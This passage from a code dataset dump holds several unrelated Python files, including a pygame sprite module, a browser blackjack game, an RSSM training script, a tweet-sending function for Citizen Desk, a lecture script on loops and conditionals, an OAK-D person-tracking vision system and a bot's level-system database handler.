self.__variables.pop()\r\n        else:\r\n            self.__variables = None\r\n\r\n        self.__message = message\r\n        self.__m = ''\r\n        self.__alpha = alpha\r\n\r\n    def set_variable(self, index, value):\r\n        self.__variables[index] = value\r\n\r\n    def set_alpha(self, alpha):\r\n        self.__alpha = alpha\r\n\r\n    def update(self):\r\n        if self.__variables:\r\n            self.__m = self.__message % tuple(self.__variables)\r\n        else:\r\n            self.__m = self.__message\r\n\r\n        self.image = self.__font.render(self.__m, True, 
self.__color)\r\n self.image.set_alpha(self.__alpha)\r\n self.rect = self.image.get_rect()\r\n self.rect.center = (self.__position)\r\n\r\n\r\nclass Powerup(pygame.sprite.Sprite):\r\n def __init__(self, location, num, image):\r\n pygame.sprite.Sprite.__init__(self)\r\n\r\n self.image = scale_image(image, item_scale)\r\n self.rect = self.image.get_rect()\r\n self.rect.center = location\r\n\r\n self.__type = num\r\n\r\n self.__count = 0\r\n self.__alpha = 255\r\n\r\n def get_type(self):\r\n return self.__type\r\n\r\n def update(self):\r\n self.__count += 1\r\n if self.__alpha == 0:\r\n self.kill()\r\n elif self.__count >= 300:\r\n self.image.set_alpha(self.__alpha)\r\n self.__alpha -= 3\r\n","repo_name":"Czajka4/SCR_Game","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"29593235612","text":"import random\r\nfrom browser import document, alert\r\nimport js\r\n\r\n# Initialise les widgets\r\nuser_cards_label = document.createElement(\"label\")\r\nuser_cards_label.textContent = \"Vos cartes : \"\r\ndocument <= user_cards_label\r\n\r\nuser_cards = document.createElement(\"label\")\r\nuser_cards_value = \"\"\r\nuser_cards.textContent = user_cards_value\r\ndocument <= user_cards\r\n\r\ncomputer_card_label = document.createElement(\"label\")\r\ncomputer_card_label.textContent = \"Carte de l'ordinateur : \"\r\ndocument <= computer_card_label\r\n\r\ncomputer_card = document.createElement(\"label\")\r\ncomputer_card_value = \"\"\r\ncomputer_card.textContent = computer_card_value\r\ndocument <= computer_card\r\n\r\nresult_label = document.createElement(\"label\")\r\ndocument <= result_label\r\n\r\n# Initialise les variables du jeu\r\nuser_cards_list = []\r\ncomputer_cards_list = []\r\nis_game_over = False\r\n\r\n# Fonctions du jeu\r\ndef deal_card():\r\n \"\"\"Retourne une carte aléatoire\"\"\"\r\n cards = [11,2,3,4,5,6,7,8,9,10,10,10,10]\r\n card = random.choice(cards)\r\n return card\r\n\r\ndef calculate_score(cards):\r\n \"\"\"Prend une liste de cartes et retourne le score total\"\"\"\r\n if sum(cards) == 21 and len(cards) == 2:\r\n return 0\r\n if 11 in cards and sum(cards) > 21:\r\n cards.remove(11)\r\n cards.append(1)\r\n return sum(cards)\r\n\r\ndef compare(user_score, computer_score):\r\n \"\"\"Compare les scores de l'utilisateur et de l'ordinateur et retourne un message\"\"\"\r\n if user_score == computer_score:\r\n result_label.textContent = \"Match nul !\"\r\n elif computer_score == 0:\r\n result_label.textContent = \"L'ordinateur a blackjack ! Vous avez perdu.\"\r\n elif user_score == 0:\r\n result_label.textContent = \"Vous avez blackjack ! Vous avez gagné.\"\r\n elif user_score > 21:\r\n result_label.textContent = \"Vous avez dépassé 21 ! Vous avez perdu.\"\r\n elif computer_score > 21:\r\n result_label.textContent = \"L'ordinateur a dépassé 21 ! 
Vous avez gagné."\r\n    elif user_score > computer_score:\r\n        result_label.textContent = \"Vous avez gagné !\"\r\n    else:\r\n        result_label.textContent = \"Vous avez perdu.\"\r\n\r\ndef update_labels():\r\n    \"\"\"Met à jour les labels avec les cartes et les scores\"\"\"\r\n    user_cards.textContent = str(user_cards_list) + \" - Score : \" + str(calculate_score(user_cards_list))\r\n    computer_card.textContent = str([computer_cards_list[0]]) + \" - Score : ?\"\r\n\r\ndef end_game():\r\n    \"\"\"Termine le jeu\"\"\"\r\n    global is_game_over\r\n    is_game_over = True\r\n    computer_score = calculate_score(computer_cards_list)\r\n    computer_card.textContent = str(computer_cards_list) + \" - Score : \" + str(computer_score)\r\n    compare(calculate_score(user_cards_list), computer_score)\r\n\r\n\r\n\r\n\r\n\r\ndef play_game():\r\n    \"\"\"Fonction principale qui gère le jeu\"\"\"\r\n    global user_cards_list, computer_cards_list, is_game_over\r\n    \r\n    # Donne deux cartes à l'utilisateur et à l'ordinateur\r\n    for i in range(2):\r\n        user_cards_list.append(deal_card())\r\n        computer_cards_list.append(deal_card())\r\n\r\n    # Met à jour les labels\r\n    update_labels()\r\n\r\n    # Boucle principale\r\n    while not is_game_over:\r\n        # Demande à l'utilisateur s'il veut prendre une carte\r\n        answer = js.confirm(\"Voulez-vous prendre une carte ?\")\r\n        if answer:\r\n            user_cards_list.append(deal_card())\r\n            update_labels()\r\n            user_score = calculate_score(user_cards_list)\r\n            if user_score > 21:\r\n                end_game()\r\n        else:\r\n            # L'ordinateur prend des cartes tant que son score est inférieur à 17\r\n            while calculate_score(computer_cards_list) < 17:\r\n                computer_cards_list.append(deal_card())\r\n                update_labels()\r\n\r\n            # Termine le jeu\r\n            end_game()\r\n\r\n    # Affiche le message de fin\r\n    result = result_label.textContent\r\n    js.alert(result)\r\n\r\n\r\nplay_game()\r\n\r\n\r\n# from browser import *\r\n \r\n# output_div = document[\"output\"]\r\n\r\n# output_div.innerHTML = \"test\"\r\n \r\n# def text(ev):\r\n#     #output_div = document[\"output\"]\r\n#     #output_div.innerHTML = \"test\"\r\n#     alert(\"hello!\")\r\n\r\n# document[\"button\"].bind(\"click\",text)","repo_name":"Sharkosss/Big_project_really_near_to_the_end","sub_path":"www/testjeu/blackjack.py","file_name":"blackjack.py","file_ext":"py","file_size_in_byte":4109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"17701609025","text":"import random\n\nimport torch\nfrom tqdm import trange\nfrom functools import partial\nfrom torch.distributions import Normal, kl\nfrom torch.distributions.kl import kl_divergence\nfrom memory import *\nfrom rssm_model import *\n\n\ndef infer(rssm, x, u, r, t, beta=1.0):\n    free_nats = torch.ones(1, device=x.device) * 3.0\n    e_t = bottle(rssm.encoder, x)\n    h_t, s_t = rssm.get_init_state(e_t[0])\n    kl_loss, rc_loss, re_loss = 0, 0, 0\n    states, priors, posteriors, posterior_samples = [], [], [], []\n    for i, a_t in enumerate(torch.unbind(u, dim=0)):\n        h_t = rssm.deterministic_state_fwd(h_t, s_t, a_t)\n        states.append(h_t)\n        priors.append(rssm.state_prior(h_t))\n        posteriors.append(rssm.state_posterior(h_t, e_t[i + 1]))\n        posterior_samples.append(Normal(*posteriors[-1]).rsample())\n        s_t = posterior_samples[-1]\n    prior_dist = Normal(*map(torch.stack, zip(*priors)))\n    posterior_dist = Normal(*map(torch.stack, zip(*posteriors)))\n    states, posterior_samples = map(torch.stack, (states, posterior_samples))\n    kld_loss = torch.max(\n        kl_divergence(posterior_dist, prior_dist).sum(-1),\n        free_nats\n    ).mean()\n    rew_loss = 
F.mse_loss(\n bottle(rssm.pred_reward, states, posterior_samples), r, reduction='mean'\n )\n\n loss = (beta * kld_loss + rew_loss)\n loss_info = {\n 'kl': kld_loss.item(),\n 'reward_pred': rew_loss.item()\n }\n return loss, loss_info\n\n\ndef train(memory, rssm, optimizer, device, N=32, H=50, grads=False):\n \"\"\"\n Training implementation as indicated in:\n Learning Latent Dynamics for Planning from Pixels\n arXiv:1811.04551\n\n (a.) The Standard Varioational Bound Method\n using only single step predictions.\n \"\"\"\n batch = memory.sample(N, H, time_first=True)\n x, u, r, t = [torch.tensor(x).float().to(device) for x in batch]\n loss, loss_info = rssm.infer(x, u, r, t)\n optimizer.zero_grad()\n nn.utils.clip_grad_norm_(rssm.parameters(), 1000., norm_type=2)\n loss.backward()\n optimizer.step()\n metrics = {\n 'losses': loss_info\n }\n if grads:\n metrics['grad_norms'] = {\n k: 0 if v.grad is None else v.grad.norm().item()\n for k, v in rssm.named_parameters()\n }\n return metrics\n\n\ndef eval(memory, rssm, optimizer, device, N=32, H=50, beta=1.0, grads=False):\n \"\"\"\n Training implementation as indicated in:\n Learning Latent Dynamics for Planning from Pixels\n arXiv:1811.04551\n\n (a.) The Standard Varioational Bound Method\n using only single step predictions.\n \"\"\"\n with torch.no_grad():\n batch = memory.sample(N, H, time_first=True)\n x, u, r, t = [torch.tensor(x).float().to(device) for x in batch]\n loss, loss_info = rssm.infer(x, u, r, t)\n metrics = {\n 'eval_losses': loss_info\n }\n if grads:\n metrics['grad_norms'] = {\n k: 0 if v.grad is None else v.grad.norm().item()\n for k, v in rssm.named_parameters()\n }\n return metrics\n\n\ndef get_mem_from_dataset(dataset):\n mem = Memory(100)\n roll = []\n for episode in dataset:\n eps = Episode()\n for t, (obs, act, reward) in enumerate(episode):\n terminal = (t == len(episode) - 2)\n eps.append(obs, act, reward, terminal)\n if terminal:\n obs, act, reward = episode[-1]\n eps.terminate(obs)\n break\n roll.append(eps)\n mem.append(roll)\n\n info = {}\n info[\"input_size\"] = obs.shape[0]\n return mem, info\n\n\ndef main():\n # input_size = 3\n # default_tuple = (torch.rand(input_size), torch.zeros(1), 0.5)\n # data_episode = [default_tuple for i in range(80)]\n # dummy_dataset = [data_episode for i in range(50)]\n dataset = load_dataset(\"dataset\")\n random.shuffle(dataset)\n mem, info = get_mem_from_dataset(dataset[:-2])\n input_size = info[\"input_size\"]\n\n eval_mem, _ = get_mem_from_dataset(dataset[-2:])\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n # rssm_model = TrustRecurrentStateSpaceModel(input_size).to(device)\n rssm_model = TrustTFM(input_size).to(device)\n optimizer = torch.optim.Adam(rssm_model.parameters(), lr=1e-5, eps=1e-4)\n res_dir = 'results/'\n metrics = {}\n summary = TensorBoardMetrics(f'{res_dir}/')\n\n for epochs in range(10):\n for _ in trange(100, desc='Iter ', leave=False):\n train_metrics = train(mem, rssm_model.train(), optimizer, device)\n for k, v in flatten_dict(train_metrics).items():\n if k not in metrics.keys():\n metrics[k] = []\n metrics[k].append(v)\n metrics[f'{k}_mean'] = np.array(v).mean()\n summary.update(metrics)\n eval_metrics = eval(eval_mem, rssm_model.eval(), optimizer, device)\n summary.update(eval_metrics)\n\n\nif __name__ == '__main__':\n 
main()\n","repo_name":"Radiance-nt/search","sub_path":"predict/trust.py","file_name":"trust.py","file_ext":"py","file_size_in_byte":4974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"21259897901","text":"#!/usr/bin/env python\n#\n# Citizen Desk\n#\n\nimport datetime\ntry:\n from citizendesk.feeds.twt.external import newstwister as controller\nexcept:\n controller = None\n\ntry:\n unicode\nexcept:\n unicode = str\n\ntry:\n long\nexcept:\n long = int\n\nfrom bson.objectid import ObjectId\n\nfrom citizendesk.common.utils import get_id_value as _get_id_value\nfrom citizendesk.common.utils import get_boolean as _get_boolean\nfrom citizendesk.common.utils import get_etag as _get_etag\nfrom citizendesk.feeds.twt.send.storage import collection, schema\nfrom citizendesk.feeds.twt.report.storage import collection as collection_reports\nfrom citizendesk.feeds.twt.authorized.storage import collection as collection_authorized\nfrom citizendesk.feeds.twt.report.storage import FEED_TYPE\nfrom citizendesk.feeds.any.report.storage import FIELD_UPDATED\n\n'''\nRequests to send a tweet, incl. a reply to a tweet\n'''\n\ndef do_post_send(db, sender_url, authorized_id, user_id, endpoint_id, tweet_spec, report_id=None):\n '''\n sends (a reply to) a tweet\n after it is sent and received, local=True, and user_id=user_id are set in the report\n '''\n if not controller:\n return (False, 'external controller not available')\n if not db:\n return (False, 'inner application error')\n\n if not authorized_id:\n return (False, 'authorized_id not specified')\n if not user_id:\n return (False, 'user_id not specified')\n if not endpoint_id:\n return (False, 'endpoint_id not specified')\n\n if type(tweet_spec) is not dict:\n return (False, 'unknown form of tweet spec')\n if ('message' not in tweet_spec) or (not tweet_spec['message']):\n return (False, 'message text not provided')\n\n follow_part = []\n tweet_data = {\n 'endpoint_id': endpoint_id,\n 'status': tweet_spec['message'],\n 'filter': {},\n }\n\n if ('sensitive' in tweet_spec) and (tweet_spec['sensitive'] is not None):\n sensitive = _get_boolean(tweet_spec['sensitive'])\n if sensitive:\n tweet_data['possibly_sensitive'] = 'true'\n\n if ('display_coordinates' in tweet_spec) and (tweet_spec['display_coordinates'] is not None):\n display_coordinates = _get_boolean(tweet_spec['display_coordinates'])\n if display_coordinates:\n tweet_data['display_coordinates'] = 'true'\n else:\n tweet_data['display_coordinates'] = 'false'\n\n for key in ['lat', 'long', 'place_id']:\n if (key in tweet_spec) and (tweet_spec[key]):\n try:\n tweet_data[key] = str(tweet_spec[key])\n except:\n return (False, 'wrong \"' + str(key) + '\" part in tweet spec')\n\n if report_id is not None:\n report_id = _get_id_value(report_id)\n\n search_spec = {'feed_type': FEED_TYPE}\n if type(report_id) is ObjectId:\n search_spec['_id'] = report_id\n else:\n search_spec['report_id'] = report_id\n\n coll = db[collection_reports]\n report = coll.find_one(search_spec)\n if not report:\n return (False, 'specified report not found')\n\n try:\n orig_user_screen_name = str(report['original']['user']['screen_name']).lower()\n if orig_user_screen_name not in follow_part:\n follow_part.append(orig_user_screen_name)\n except:\n return (False, 'can not find the original tweet sender')\n\n check_inclusion = '@' + orig_user_screen_name.lower()\n try:\n if check_inclusion not in tweet_spec['message'].lower():\n return (False, 'mentioning the original tweet 
sender not found in the tweet text')\n except:\n return (False, 'can not check inclusion of the original tweet sender')\n\n try:\n tweet_data['in_reply_to_status_id'] = str(report['original_id'])\n except:\n return (False, 'can not find id_str of the original tweet')\n\n coll = db[collection_authorized]\n authorized_id = _get_id_value(authorized_id)\n\n authorized_data = coll.find_one({'_id': authorized_id})\n if not authorized_data:\n return (False, 'saved report on the send-tweet not found')\n\n try:\n authorized_spec = {\n 'consumer_key': authorized_data['spec']['app_consumer_key'],\n 'consumer_secret': authorized_data['spec']['app_consumer_secret'],\n 'access_token_key': authorized_data['spec']['authorized_access_token_key'],\n 'access_token_secret': authorized_data['spec']['authorized_access_token_secret'],\n }\n sender_screen_name = str(authorized_data['spec']['screen_name_search'])\n if sender_screen_name not in follow_part:\n follow_part.append(sender_screen_name)\n except Exception as exc:\n return (False, 'authorized info does not contain all the required data: ' + str(exc))\n\n for key in authorized_spec:\n if not authorized_spec[key]:\n return (False, 'the \"' + str(key) + '\" part of authorized info is empty')\n\n tweet_data['filter']['follow'] = follow_part\n\n connector = controller.NewstwisterConnector(sender_url)\n res = connector.send_tweet(authorized_spec, tweet_data)\n if not res[0]:\n err_msg = 'error during send-tweet request dispatching: ' + res[1]\n return (False, err_msg)\n\n ret_envelope = res[1]\n if type(ret_envelope) is not dict:\n return (False, 'unknown form of returned send-tweet data: ' + str(type(ret_envelope)))\n\n if ('status' not in ret_envelope) or (not ret_envelope['status']):\n err_msg = ''\n if ('error' in ret_envelope) and (ret_envelope['error']):\n err_msg = ': ' + str(ret_envelope['error'])\n return (False, 'status not acknowledged in returned send-tweet data' + err_msg)\n if ('data' not in ret_envelope) or (not ret_envelope['data']):\n return (False, 'payload not provided in returned send-tweet data')\n\n ret_data = ret_envelope['data']\n if type(ret_data) is not dict:\n return (False, 'unknown form of returned payload in send-tweet data: ' + str(type(ret_data)))\n\n if 'id_str' not in ret_data:\n return (False, 'returned send-tweet data without tweet identifier')\n\n coll = db[collection_reports]\n saved_tweet = coll.find_one({'original_id': ret_data['id_str']})\n if not saved_tweet:\n return (False, 'saved report on the send-tweet not found')\n\n doc_id = saved_tweet['_id']\n\n saved_update = {\n 'local': True,\n 'user_id': _get_id_value(user_id),\n 'proto': False,\n FIELD_UPDATED: datetime.datetime.utcnow(),\n #'_etag': _get_etag(),\n }\n\n coll.update({'_id': doc_id}, {'$set': saved_update})\n\n return (True, {'_id': doc_id})\n\n","repo_name":"sourcefabric-innovation/citizendesk-core","sub_path":"src/citizendesk/feeds/twt/send/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":6734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"37443933291","text":"from typing import NamedTuple\n\nimport dm_env\nfrom bsuite.baselines import base\nfrom jax.experimental.stax import (\n Dense,\n FanInConcat,\n Identity,\n serial,\n parallel,\n Relu,\n FanOut,\n)\n\nfrom .modules import DiscardHidden, LSTMCell\nfrom .base import module\n\n\nclass HParams(NamedTuple):\n hidden_size: int = 256\n\n\n@module\ndef Lpg(hparams):\n phi = serial(Dense(16), Dense(1))\n return serial(\n 
# FanOut(6),\n parallel(Identity, Identity, Identity, Identity, phi, phi),\n FanInConcat(),\n LSTMCell(hparams.hidden_size)[0:2],\n DiscardHidden(),\n Relu,\n FanOut(2),\n parallel(phi, phi),\n )\n\n\nclass A2C(base.Agent):\n def select_action(self, timestep: dm_env.TimeStep) -> base.Action:\n return super().select_action(timestep)\n\n def update(\n self,\n timestep: dm_env.TimeStep,\n action: base.Action,\n new_timestep: dm_env.TimeStep,\n ) -> None:\n return super().update(timestep, action, new_timestep)\n","repo_name":"epignatelli/discovering-reinforcement-learning-algorithms","sub_path":"lpg/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"79"} +{"seq_id":"33476780545","text":"\"\"\"\nLecture 10: While Loops and If-Else in Python\nMomentum Learning\nIntroduction to Python\nM. Bedir Tapkan\n\"\"\"\n\n# while :\n#\t\n\n# ex\nn = 5\nwhile n > 0:\n\tn -= 1\n\tprint(n)\n\n# ex\na = [1, 2, 3]\nwhile a:\n\tprint(a.pop())\n\nn = 5\nwhile n > 0:\n\tn -= 1\n\tif n == 2:\n\t\tcontinue\n\tprint(n)\n\n# while :\n# \t\n# else:\n# \t\n\n#infinite loop\n# while True:\n# \tprint(\"HI!\")\n\n# if-else Statements\n\n# if :\n# \t\n\na = 0\nb = 1\n\nif a < b:\n\tprint(\"Yes, it is smaller!\")\n\nif b > a:\n\tprint(\"No, it is greater!\")\n\nif a and b:\n\tprint(\"Done - and\")\n\nif a or b:\n\tprint(\"Done - or\")\n\nif 'd' in 'Bedir':\n\tprint(\"Done - in it\")\n\n# If the weather is nice I will:\n# \t- Mow the lawn\n# \t- Weed the garden\n# \t- Take the dog for a walk\n# If the weather is not nice then I won't do any of these\n\nif True:\n\ta = 4\n\tb = 2\n\na = 3\nb = 0\nif a > 0:\n\tif b > 0:\n\t\tprint(\"Success!\")\n\telse: \n\t\tprint(\"b just failed!\")\t\nelse:\n\tprint(\"Failure!\")\n\nif a == 1:\n\tprint('One')\nif a == 2:\n\tprint('Two')\nif a == 3:\n\tprint('Three')\n\na = 7\nif a > 5:\n\tprint(\"Yes\")\nelif a < 8:\n\tprint(\"No\")\nelif a == 3:\n\tprint(\"Interesting!\")\nelse:\n\tprint(\"No idea\")\n\n# pass\nif a == 7:\n\tpass\n\nprint('Hey')\n\na = 17\n\nif a > 15:\n\tprint(\"1\")\nelif a > 14:\n\tprint(\"2\")\nelif a > 10: \n\tprint(\"3\")\nelse:\n\tprint('4')","repo_name":"BedirT/Python-Class-2019","sub_path":"AFTER CLASS/L10 - While Loops & If Statements in Python.py","file_name":"L10 - While Loops & If Statements in Python.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"3135570977","text":"from typing import Tuple, List\nfrom pathlib import Path\nimport depthai as dai\nimport numpy as np\nimport os\n\n\nclass VisionSystem:\n \"\"\"\n A handler for the entire vision system on the Raspberry Pi for the HeadsUp project.\n \"\"\"\n\n # number of columns in map\n NUM_COLUMNS = 10\n\n # map from IDs to labels\n LABEL_MAP = [\"background\", \"aeroplane\", \"bicycle\", \"bird\", \"boat\", \"bottle\", \"bus\", \"car\", \"cat\", \"chair\", \"cow\",\n \"diningtable\", \"dog\", \"horse\", \"motorbike\", \"person\", \"pottedplant\", \"sheep\", \"sofa\", \"train\", \"tvmonitor\"]\n\n def __init__(self, pipeline: dai.Pipeline):\n \"\"\"\n Set up the vision system.\n \"\"\"\n self.has_device = False\n\n nnPath = str(\n (Path(__file__).parent / Path('resnet34-ssd1200_openvino_2021.4_5shave.blob')).resolve().absolute())\n\n # Define sources and outputs\n monoLeft = pipeline.create(dai.node.MonoCamera)\n monoRight = pipeline.create(dai.node.MonoCamera)\n stereo = 
pipeline.create(dai.node.StereoDepth)\n spatialLocationCalculator = pipeline.create(\n dai.node.SpatialLocationCalculator)\n\n camRgb = pipeline.create(dai.node.ColorCamera)\n spatialDetectionNetwork = pipeline.create(\n dai.node.MobileNetSpatialDetectionNetwork)\n objectTracker = pipeline.create(dai.node.ObjectTracker)\n\n xoutDepth = pipeline.create(dai.node.XLinkOut)\n xoutSpatialData = pipeline.create(dai.node.XLinkOut)\n xoutRGB = pipeline.create(dai.node.XLinkOut)\n xinSpatialCalcConfig = pipeline.create(dai.node.XLinkIn)\n\n trackerOut = pipeline.create(dai.node.XLinkOut)\n\n xoutRGB.setStreamName(\"rgb\")\n xoutDepth.setStreamName(\"depth\")\n xoutSpatialData.setStreamName(\"spatialData\")\n xinSpatialCalcConfig.setStreamName(\"spatialCalcConfig\")\n\n trackerOut.setStreamName(\"tracklets\")\n\n # Properties\n monoLeft.setResolution(\n dai.MonoCameraProperties.SensorResolution.THE_400_P)\n monoLeft.setBoardSocket(dai.CameraBoardSocket.LEFT)\n monoRight.setResolution(\n dai.MonoCameraProperties.SensorResolution.THE_400_P)\n monoRight.setBoardSocket(dai.CameraBoardSocket.RIGHT)\n\n camRgb.setPreviewSize(1200, 1200)\n camRgb.setResolution(\n dai.ColorCameraProperties.SensorResolution.THE_1080_P)\n camRgb.setInterleaved(False)\n camRgb.setColorOrder(dai.ColorCameraProperties.ColorOrder.BGR)\n\n stereo.setDefaultProfilePreset(\n dai.node.StereoDepth.PresetMode.HIGH_DENSITY)\n stereo.setLeftRightCheck(True)\n stereo.setSubpixel(False)\n # Align depth map to the perspective of RGB camera, on which inference is done\n stereo.setDepthAlign(dai.CameraBoardSocket.RGB)\n stereo.setOutputSize(monoLeft.getResolutionWidth(),\n monoLeft.getResolutionHeight())\n\n spatialLocationCalculator.inputConfig.setWaitForMessage(False)\n\n spatialDetectionNetwork.setBlobPath(nnPath)\n spatialDetectionNetwork.setConfidenceThreshold(0.5)\n spatialDetectionNetwork.input.setBlocking(False)\n spatialDetectionNetwork.setBoundingBoxScaleFactor(0.5)\n spatialDetectionNetwork.setDepthLowerThreshold(100)\n spatialDetectionNetwork.setDepthUpperThreshold(5000)\n\n objectTracker.setDetectionLabelsToTrack([15]) # track only person\n # possible tracking types: ZERO_TERM_COLOR_HISTOGRAM, ZERO_TERM_IMAGELESS, SHORT_TERM_IMAGELESS, SHORT_TERM_KCF\n objectTracker.setTrackerType(dai.TrackerType.ZERO_TERM_COLOR_HISTOGRAM)\n # take the smallest ID when new object is tracked, possible options: SMALLEST_ID, UNIQUE_ID\n objectTracker.setTrackerIdAssignmentPolicy(\n dai.TrackerIdAssignmentPolicy.SMALLEST_ID)\n\n # Linking\n monoLeft.out.link(stereo.left)\n monoRight.out.link(stereo.right)\n\n camRgb.preview.link(spatialDetectionNetwork.input)\n camRgb.preview.link(xoutRGB.input)\n objectTracker.out.link(trackerOut.input)\n spatialDetectionNetwork.passthrough.link(\n objectTracker.inputTrackerFrame)\n\n spatialDetectionNetwork.passthrough.link(\n objectTracker.inputDetectionFrame)\n spatialDetectionNetwork.out.link(objectTracker.inputDetections)\n stereo.depth.link(spatialDetectionNetwork.inputDepth)\n\n spatialLocationCalculator.passthroughDepth.link(xoutDepth.input)\n stereo.depth.link(spatialLocationCalculator.inputDepth)\n\n spatialLocationCalculator.out.link(xoutSpatialData.input)\n xinSpatialCalcConfig.out.link(spatialLocationCalculator.inputConfig)\n\n for col in range(VisionSystem.NUM_COLUMNS):\n # Set up column configuration\n topLeft = dai.Point2f(col / VisionSystem.NUM_COLUMNS, 0.0)\n bottomRight = dai.Point2f(\n (col + 1) / (VisionSystem.NUM_COLUMNS), 1.0)\n\n cfgdata = dai.SpatialLocationCalculatorConfigData()\n 
cfgdata.depthThresholds.lowerThreshold = 100\n cfgdata.depthThresholds.upperThreshold = 10000\n cfgdata.roi = dai.Rect(topLeft, bottomRight)\n spatialLocationCalculator.initialConfig.addROI(cfgdata)\n\n def use_device(self, device: dai.Device):\n \"\"\"\n After creating a device, initialize device-dependent parts of the vision system.\n \"\"\"\n # Output queue will be used to get the depth frames from the outputs defined above\n self.rgbQueue = device.getOutputQueue(\n name=\"rgb\", maxSize=4, blocking=False)\n self.depthQueue = device.getOutputQueue(\n name=\"depth\", maxSize=4, blocking=False)\n self.spatialCalcQueue = device.getOutputQueue(\n name=\"spatialData\", maxSize=4, blocking=False)\n self.spatialCalcConfigInQueue = device.getInputQueue(\n \"spatialCalcConfig\")\n # things that are being tracked\n self.tracklets = device.getOutputQueue(\"tracklets\", 4, False)\n\n self.has_device = True\n\n def periodic(self) -> Tuple[np.array, List[Tuple[float, float]]]:\n \"\"\"\n Perform periodic steps associated with the vision system.\n \"\"\"\n if not self.has_device:\n raise RuntimeError(\n \"Vision system was not initialized with `use_device()` - cannot perform periodic()\")\n\n # Blocking call, will wait until a new data has arrived\n depth_ai_frame = self.depthQueue.get()\n rgb_frame = self.rgbQueue.get()\n cv_frame = rgb_frame.getCvFrame()\n\n spatialData = self.spatialCalcQueue.get().getSpatialLocations()\n trackletsData = self.tracklets.get().tracklets\n\n depths = [int(data.spatialCoordinates.z) for data in spatialData]\n rho_theta_pairs = []\n # print(depths)\n os.system('clear')\n for t in trackletsData:\n tracklet_coordinates = np.array([t.spatialCoordinates.x, t.spatialCoordinates.y, t.spatialCoordinates.z])\n rho = np.sqrt(t.spatialCoordinates.x ** 2 + t.spatialCoordinates.z ** 2) # * 0.00328084 (mm to ft)\n theta = -np.arctan2(t.spatialCoordinates.x, t.spatialCoordinates.z) * 180/np.pi\n\n rho_theta_pairs.append((rho, theta))\n # print(f\"({rho}, {theta})\")\n # t.label = f\"({rho}, {theta})\"\n\n # label = VisionSystem.LABEL_MAP[t.label] if t.label < len(\n # VisionSystem.LABEL_MAP) else str(t.label)\n # print(\n # f\"found tracklet {t.id}: {label} at ({t.spatialCoordinates.x:.4}, {t.spatialCoordinates.y:.4}, {t.spatialCoordinates.z:.4})\")\n\n return cv_frame, rho_theta_pairs\n","repo_name":"claytonwramsey/headsup","sub_path":"pi/vision.py","file_name":"vision.py","file_ext":"py","file_size_in_byte":7700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"16312226629","text":"import services.serviceDatabase as serviceDatabase \n\nfrom services.serviceLogger import Logger\nfrom settings.settingBot import debug\n\n# Add server to the database\ndef addServer(serverID):\n requestFormat = \"\"\"\n INSERT INTO addon_levelSystem_settings (serverID)\n VALUES (%s);\n \"\"\"\n requestSettings = (serverID,)\n try:\n Logger.debug(\"[HANDLER][LEVELSYSTEM][ADD] Adding server to the DB \" + str(serverID))\n \n serviceDatabase.makeRequest(requestFormat, requestSettings)\n \n except Exception as error:\n Logger.error(\"[HANDLER][LEVELSYSTEM][ADD] DB error addServer -> \" + str(error))\n\n\n# Delete server from the database\ndef deleteServer(serverID):\n requestFormat = \"\"\"\n DELETE FROM addon_levelSystem_settings\n WHERE serverID = %s;\n \"\"\"\n requestSettings = (serverID,)\n try:\n Logger.debug(\"[HANDLER][LEVELSYSTEM][DEL] Deleting server from the DB \" + str(serverID))\n \n serviceDatabase.makeRequest(requestFormat, 
requestSettings)\n \n except Exception as error:\n Logger.error(\"[HANDLER][LEVELSYSTEM][DEL] DB error deleteServer -> \" + str(error))\n\n\n# Get server from the database\ndef getServer(serverID):\n requestFormat = \"\"\"\n SELECT serverID\n FROM addon_levelSystem_settings\n WHERE serverID = %s\n \"\"\"\n requestSettings = (serverID,)\n try:\n Logger.debug(\"[HANDLER][LEVELSYSTEM][GET] Getting server from the DB \" + str(serverID))\n \n return serviceDatabase.getInfoRequest(requestFormat, requestSettings)\n \n except Exception as error:\n Logger.error(\"[HANDLER][LEVELSYSTEM][GET] DB error getServer -> \" + str(error))\n\n\n# Get all servers from the database\ndef getAllServers():\n requestFormat = \"\"\"\n SELECT serverID\n FROM addon_levelSystem_settings\n \"\"\"\n requestSettings = ()\n try:\n Logger.debug(\"[HANDLER][LEVELSYSTEM][GET] Getting all servers from the DB\")\n \n return serviceDatabase.getInfoRequest(requestFormat, requestSettings)\n \n except Exception as error:\n Logger.error(\"[HANDLER][LEVELSYSTEM][GET] DB error getAllServers -> \" + str(error))\n\n\n# Set channel id for the addon in the database\ndef setChannelID(serverID, channelID):\n requestFormat = \"\"\"\n UPDATE addon_levelSystem_settings\n SET channelID = %s\n WHERE serverID = %s;\n \"\"\"\n requestSettings = (channelID, serverID,)\n try:\n Logger.debug(\"[HANDLER][LEVELSYSTEM][SET] Setting channelID to the DB \" + str(serverID) + \" \" + str(channelID))\n \n serviceDatabase.makeRequest(requestFormat, requestSettings)\n \n except Exception as error:\n Logger.error(\"[HANDLER][LEVELSYSTEM][SET] DB error setChannelID -> \" + str(error))\n\n\n# Get channel id for the addon from the database\ndef getChannelID(serverID):\n requestFormat = \"\"\"\n SELECT channelID\n FROM addon_levelSystem_settings\n WHERE serverID = %s\n \"\"\"\n requestSettings = (serverID,)\n try:\n Logger.debug(\"[HANDLER][LEVELSYSTEM][GET] Getting channelID from the DB \" + str(serverID))\n \n return serviceDatabase.getInfoRequest(requestFormat, requestSettings)\n \n except Exception as error:\n Logger.error(\"[HANDLER][LEVELSYSTEM][GET] DB error getChannelID -> \" + 